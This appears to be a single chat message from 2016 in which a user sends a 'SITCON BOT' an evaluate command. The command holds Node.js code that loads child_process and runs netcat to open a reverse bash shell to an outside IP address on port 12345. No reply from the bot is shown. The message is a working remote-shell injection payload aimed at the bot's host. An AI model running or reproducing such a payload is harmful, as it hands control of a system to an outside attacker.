Jasper Yu says to SITCON BOT Testpool/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'nc -c /bin/bash 59.127.163.155 12345'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });at Sun, May 8, 2016 4:31 PM